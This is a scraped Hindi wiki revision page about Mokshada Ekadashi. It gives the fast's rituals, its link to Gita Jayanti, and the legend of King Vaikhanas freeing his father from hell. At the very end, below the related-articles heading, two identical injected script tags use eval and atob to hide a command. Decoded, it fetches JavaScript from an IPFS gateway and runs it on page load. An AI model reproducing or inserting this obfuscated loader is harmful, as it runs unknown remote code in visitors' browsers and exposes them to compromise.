Difference between revisions of "मोक्षदा एकादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 7: Line 7:
 
==कथा==
 
==कथा==
 
एक समय गोकुल नगर में वैखानस नामक राजा राज्य करता था। एक दिन राजा ने स्वप्न में एक आश्चर्य की बात देखी। उसका पिता नरक में पड़ा है और वह अपने पुत्र से उद्धार की याचना कर रहा है। राजा अपने पिता की यह दशा देख व्याकुल हो उठा। उसी समय उसकी निद्रा भंग हो गई। प्रातः राजा ने ब्राह्मणों को बुलाकर अपने स्वप्न का भेद पूछा। तब ब्राह्मणों ने कहा- 'हे राजन! इसके लिए पर्वत नामक मुनि के आश्रम में जाकर इसका उद्धार पूछो।' तब राजा ने वैसा ही किया। जब पर्वत मुनि ने राजा की बात सुनी वे चिंतित हो गए। उन्होंने अपनी योग दृष्टि से राजा के पिता को देखा और बोले- 'राजन! पूर्वजन्म के पापों से आपके पिताजी को नर्कवास प्राप्त हुआ है। उन्होंने सौतेली स्त्री के वश में होकर दूसरी स्त्री को रतिदान का निषेध कर दिया था। इसी दोष से उन्हें नरक की प्राप्ति हुई है। अब तुम मोक्षदा एकादशी को व्रत कर उसका फल अपने पिता को अर्पण करो तो उनकी मुक्ति हो सकती है।' राजा ने मुनि के कथानुसार ही मोक्षदा एकादशी का यथा नियम व्रत किया और ब्राह्मणों को भोजन करा दक्षिणा, वस्त्रादि अर्पण कर आशीर्वाद प्राप्त किया। इस उत्तम कर्म से उसने प्रत्यक्ष देखा कि आकाश में मंगल ध्वनि हो रही है और उसका पिता विमान में बैठ स्वर्ग को जा रहा है। उसके पिता ने कहा- 'हे पुत्र! मैं थोड़े समय यह स्वर्ग का सुख भोग मोक्ष को प्राप्त कर जाऊंगा। तेरे व्रत के प्रभाव से मेरा नर्कवास छूट गया, तेरा कल्याण हो।'  
 
एक समय गोकुल नगर में वैखानस नामक राजा राज्य करता था। एक दिन राजा ने स्वप्न में एक आश्चर्य की बात देखी। उसका पिता नरक में पड़ा है और वह अपने पुत्र से उद्धार की याचना कर रहा है। राजा अपने पिता की यह दशा देख व्याकुल हो उठा। उसी समय उसकी निद्रा भंग हो गई। प्रातः राजा ने ब्राह्मणों को बुलाकर अपने स्वप्न का भेद पूछा। तब ब्राह्मणों ने कहा- 'हे राजन! इसके लिए पर्वत नामक मुनि के आश्रम में जाकर इसका उद्धार पूछो।' तब राजा ने वैसा ही किया। जब पर्वत मुनि ने राजा की बात सुनी वे चिंतित हो गए। उन्होंने अपनी योग दृष्टि से राजा के पिता को देखा और बोले- 'राजन! पूर्वजन्म के पापों से आपके पिताजी को नर्कवास प्राप्त हुआ है। उन्होंने सौतेली स्त्री के वश में होकर दूसरी स्त्री को रतिदान का निषेध कर दिया था। इसी दोष से उन्हें नरक की प्राप्ति हुई है। अब तुम मोक्षदा एकादशी को व्रत कर उसका फल अपने पिता को अर्पण करो तो उनकी मुक्ति हो सकती है।' राजा ने मुनि के कथानुसार ही मोक्षदा एकादशी का यथा नियम व्रत किया और ब्राह्मणों को भोजन करा दक्षिणा, वस्त्रादि अर्पण कर आशीर्वाद प्राप्त किया। इस उत्तम कर्म से उसने प्रत्यक्ष देखा कि आकाश में मंगल ध्वनि हो रही है और उसका पिता विमान में बैठ स्वर्ग को जा रहा है। उसके पिता ने कहा- 'हे पुत्र! मैं थोड़े समय यह स्वर्ग का सुख भोग मोक्ष को प्राप्त कर जाऊंगा। तेरे व्रत के प्रभाव से मेरा नर्कवास छूट गया, तेरा कल्याण हो।'  
[[Category:पर्व_और_त्योहार]][[Category:संस्कृति_कोश]]
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}
 
__INDEX__
 
__INDEX__
 +
[[Category:पर्व_और_त्योहार]][[Category:संस्कृति_कोश]]

Revision as of 11:39, 15 December 2010

margashirsh shukl paksh ki ekadashi ko hi 'mokshada ekadashi' kaha jata hai.

vrat aur vidhi

puranoan ke anusar margashirsh shukl paksh ki ekadashi mokshada hai. isi din 'gita jayanti' bhi manaee jati hai tatha isi din datt jayanti bhi hoti hai. isi din bhagavan krishna ne mohit hue arjun ko gita ka upadesh diya tha. is din gita, shrikrishna, vyas ji adi ka vidhipoorvak poojan karake gita jayanti ka utsav manaya jata hai.

bhagavan damodar ki dhoop, dip, naivedy se pooja karani chahie. brahman ko bhojan karakar danadi dene se vishesh phal prapt hota hai. is din vrat karane se durlabh moksh pad ki prapti hoti hai.

katha

ek samay gokul nagar mean vaikhanas namak raja rajy karata tha. ek din raja ne svapn mean ek ashchary ki bat dekhi. usaka pita narak mean p da hai aur vah apane putr se uddhar ki yachana kar raha hai. raja apane pita ki yah dasha dekh vyakul ho utha. usi samay usaki nidra bhang ho gee. pratah raja ne brahmanoan ko bulakar apane svapn ka bhed poochha. tab brahmanoan ne kaha- 'he rajan! isake lie parvat namak muni ke ashram mean jakar isaka uddhar poochho.' tab raja ne vaisa hi kiya. jab parvat muni ne raja ki bat suni ve chiantit ho ge. unhoanne apani yog drishti se raja ke pita ko dekha aur bole- 'rajan! poorvajanm ke papoan se apake pitaji ko narkavas prapt hua hai. unhoanne sauteli stri ke vash mean hokar doosari stri ko ratidan ka nishedh kar diya tha. isi dosh se unhean narak ki prapti huee hai. ab tum mokshada ekadashi ko vrat kar usaka phal apane pita ko arpan karo to unaki mukti ho sakati hai.' raja ne muni ke kathanusar hi mokshada ekadashi ka yatha niyam vrat kiya aur brahmanoan ko bhojan kara dakshina, vastradi arpan kar ashirvad prapt kiya. is uttam karm se usane pratyaksh dekha ki akash mean mangal dhvani ho rahi hai aur usaka pita viman mean baith svarg ko ja raha hai. usake pita ne kaha- 'he putr! maian tho de samay yah svarg ka sukh bhog moksh ko prapt kar jaooanga. tere vrat ke prabhav se mera narkavas chhoot gaya, tera kalyan ho.'

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>